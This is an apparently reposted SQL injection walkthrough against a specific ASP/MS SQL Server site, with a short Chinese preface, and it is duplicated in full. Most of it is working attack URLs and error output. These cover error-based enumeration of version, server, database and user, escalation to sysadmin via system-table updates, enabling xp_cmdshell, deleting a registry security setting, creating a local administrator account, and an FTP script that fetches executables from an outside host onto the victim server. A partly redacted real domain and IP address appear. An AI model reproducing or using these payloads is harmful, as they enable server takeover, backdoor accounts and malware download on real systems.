ps:一直来很多牛人说可以web/sql分离的情况下,利用odbc来拿本机权限,不过这篇文章好象是连回本地来做测试。不过总算是一个突破
EXAMPLE TO USE:
http://www.xxxx.com/FullStory.asp?id=1
Exploiting the hole:
http://www.xxxx.com/FullStory.asp?id=1'
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBCSQLServerDriver] [SQLServer]
Unclosed quotation mark before the character string ''.
/Including/general.asp, line 840/
VERSION
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--
Code:
[SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright © 1988-2002 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/Including/general.asp, line 840
SERVER NAME
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UNESCO' to a column of data type int.
/Including/general.asp, line 840
DATABASE NAME
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'NhaXinh' to a column of data type int.
/Including/general.asp, line 840
USER
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'nhaxinh' to a column of data type int.
/Including/general.asp, line 840
OPENING REMOTE LINK (http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_oa-oz_78z8.asp)
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Ad hoc access to OLE DB provider 'sqloledb' has been denied. You must access this provider through a linked server.
/Including/general.asp, line 840
GUEST = DB_OWNER :DDD
http://www.XXXX.com/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test'--
Code:
No result expected, normal page loading
Enable us to do sum nice stuff like xp_regwrite e xp_cmdshell
ADDIN TO "BUILTIN/ADMINISTRATORS"
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN/ADMINISTRATORS''','xx' exec sp_executesql N'drop view dbo.test'--
and then
http://www.xxxx.com/FullStory.asp?id=1;exec master..sp_addsrvrolemember 'nhaxinh',sysadmin --
ENABLE OPENROWSET/OLEDB
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'SYSTEM'.
/Including/general.asp, line 840
http://www.xxxx.com/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM/CurrentControlSet/Services/Tcpip/Parameters','EnableSecurityFilters'
ENABLE MASTER..XP_CMDSHELL & "ALLOW UPDATES"
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN/Administrators;pwd=', 'set fmtonly off exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')
!!PAY ATTETION TO THE SERVER= PARAMETER
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object 'set fmtonly off master..sp_addextendedproc xp_cmd 'xpsql70.dll' exec sp_configure 'allow updates', '1' reconfigure with override'. The OLE DB provider 'sqloledb' indicates that the object has no columns.
/Including/general.asp, line 840
if dun work try:
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN/Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')--
NOW SCRIPT KIDDIES
http://www.xxxx.com/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'ipconfig'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25'))-- (%25 == “%”)
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int.
/Including/general.asp, line 840
C:/> ping 203.162.7.70
Pinging 203.162.7.70 with 32 bytes of data:
Reply from 203.162.7.70: bytes=32 time=232ms TTL=118
C:/> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70:(none)):
203.162.7.70 == panvietnam.com
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN/Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"')-- (%26 == "&")
Code:
C:/> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service
(Version 5.0).
User (203.162.7.70:(none)): a
331 Password required for a.
Password:
530 User a cannot log in.
Login failed.
ftp> bye
UPLOAD NETCAT LÊN
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN/Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f')-- (%3E == ">")
Code:
echo open a.b.c.d >f
echo user a a >>f
echo bin >> f
echo cd a >>f
echo mget * >>f
echo quit >>f
ftp -v -i -n -s:f
del f
http://www.xxxx.com/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'dir nx.exe'--
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))--
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int.
/Including/general.asp, line 840
---
EXAMPLE TO USE:
http://www.xxxx.com/FullStory.asp?id=1
Exploiting the hole:
http://www.xxxx.com/FullStory.asp?id=1'
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBCSQLServerDriver] [SQLServer]
Unclosed quotation mark before the character string ''.
/Including/general.asp, line 840/
VERSION
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--
Code:
[SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright © 1988-2002 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/Including/general.asp, line 840
SERVER NAME
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UNESCO' to a column of data type int.
/Including/general.asp, line 840
DATABASE NAME
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'NhaXinh' to a column of data type int.
/Including/general.asp, line 840
USER
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'nhaxinh' to a column of data type int.
/Including/general.asp, line 840
OPENING REMOTE LINK (http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_oa-oz_78z8.asp)
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Ad hoc access to OLE DB provider 'sqloledb' has been denied. You must access this provider through a linked server.
/Including/general.asp, line 840
GUEST = DB_OWNER :DDD
http://www.XXXX.com/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test'--
Code:
No result expected, normal page loading
Enable us to do sum nice stuff like xp_regwrite e xp_cmdshell
ADDIN TO "BUILTIN/ADMINISTRATORS"
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN/ADMINISTRATORS''','xx' exec sp_executesql N'drop view dbo.test'--
and then
http://www.xxxx.com/FullStory.asp?id=1;exec master..sp_addsrvrolemember 'nhaxinh',sysadmin --
ENABLE OPENROWSET/OLEDB
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'SYSTEM'.
/Including/general.asp, line 840
http://www.xxxx.com/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM/CurrentControlSet/Services/Tcpip/Parameters','EnableSecurityFilters'
ENABLE MASTER..XP_CMDSHELL & "ALLOW UPDATES"
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN/Administrators;pwd=', 'set fmtonly off exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')
!!PAY ATTETION TO THE SERVER= PARAMETER
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object 'set fmtonly off master..sp_addextendedproc xp_cmd 'xpsql70.dll' exec sp_configure 'allow updates', '1' reconfigure with override'. The OLE DB provider 'sqloledb' indicates that the object has no columns.
/Including/general.asp, line 840
if dun work try:
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN/Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')--
NOW SCRIPT KIDDIES
http://www.xxxx.com/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'ipconfig'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25'))-- (%25 == “%”)
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int.
/Including/general.asp, line 840
C:/> ping 203.162.7.70
Pinging 203.162.7.70 with 32 bytes of data:
Reply from 203.162.7.70: bytes=32 time=232ms TTL=118
C:/> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70:(none)):
203.162.7.70 == panvietnam.com
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN/Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"')-- (%26 == "&")
Code:
C:/> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service
(Version 5.0).
User (203.162.7.70:(none)): a
331 Password required for a.
Password:
530 User a cannot log in.
Login failed.
ftp> bye
UPLOAD NETCAT LÊN
http://www.xxxx.com/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN/Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f')-- (%3E == ">")
Code:
echo open a.b.c.d >f
echo user a a >>f
echo bin >> f
echo cd a >>f
echo mget * >>f
echo quit >>f
ftp -v -i -n -s:f
del f
http://www.xxxx.com/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'dir nx.exe'--
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))--
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int.
/Including/general.asp, line 840
---
880
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
